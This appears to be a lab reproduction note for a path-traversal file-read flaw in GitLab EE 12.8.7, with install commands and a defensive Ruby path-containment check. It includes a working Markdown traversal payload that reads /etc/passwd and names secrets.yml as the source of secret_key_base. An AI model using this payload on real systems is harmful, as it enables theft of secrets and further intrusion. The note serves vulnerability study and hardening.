Reference:
https://hackerone.com/reports/827052
Download of the affected version:
https://packages.gitlab.com/gitlab/gitlab-ee/packages/ubuntu/xenial/gitlab-ee_12.8.7-ee.0_amd64.deb
wget --content-disposition https://packages.gitlab.com/gitlab/gitlab-ee/packages/ubuntu/xenial/gitlab-ee_12.8.7-ee.0_amd64.deb/download.deb
sudo dpkg -i gitlab-ee_12.8.7-ee.0_amd64.deb
Then start it:
sudo gitlab-ctl reconfigure
Check the status of each GitLab component:
sudo gitlab-ctl status
sudo gitlab-ctl tail gitlab-rails
Reference:
https://www.iteye.com/blog/hai0378-2366869
Demo
Payload (a Markdown image reference whose /uploads/ path traverses out of the uploads directory):
![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)
/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
Reading this file yields secret_key_base.
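The defensive counterpart to the payload above is a containment check: an /uploads/ reference is only honoured if its normalised path still lies inside the uploads root. The following is an added example, not GitLab's own code; UPLOADS_ROOT and the helper names are assumptions, and the check expects references that have already been URL-decoded.

```ruby
require 'pathname'

# Assumed uploads root for the check (Omnibus default; not taken from the page).
UPLOADS_ROOT = '/var/opt/gitlab/gitlab-rails/uploads'

# The traversal payload from the demo above, kept here as sample input.
TRAVERSAL_PAYLOAD =
  '![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)'

# A constructed benign reference for comparison.
BENIGN_PAYLOAD = '![logo](/uploads/0123456789abcdef0123456789abcdef/logo.png)'

# Pull every Markdown link or image target that points at /uploads/ out of a text.
def upload_references(markdown)
  markdown.scan(%r{!?\[[^\]]*\]\(([^)\s]+)\)})
          .flatten
          .select { |target| target.start_with?('/uploads/') }
end

# True only if the reference still lies inside the uploads root once the
# '.' and '..' segments are collapsed. Pathname#cleanpath does this lexically
# (no filesystem access) and clamps excess '..' at '/', so the demo payload
# resolves to '/etc/passwd' and fails the prefix test. Assumes the reference
# has already been URL-decoded; decode before calling, never after.
def safe_upload_path?(reference, root = UPLOADS_ROOT)
  relative = reference.sub(%r{\A/uploads/}, '')
  return false if relative.empty?
  resolved = Pathname.new(File.join(root, relative)).cleanpath.to_s
  resolved.start_with?("#{root}/")
end

# References that a hardened uploads rewriter should refuse to copy or serve.
def rejected_references(markdown)
  upload_references(markdown).reject { |ref| safe_upload_path?(ref) }
end

if __FILE__ == $PROGRAM_NAME
  puts "rejected in traversal payload: #{rejected_references(TRAVERSAL_PAYLOAD).inspect}"
  puts "rejected in benign payload:    #{rejected_references(BENIGN_PAYLOAD).inspect}"
end
```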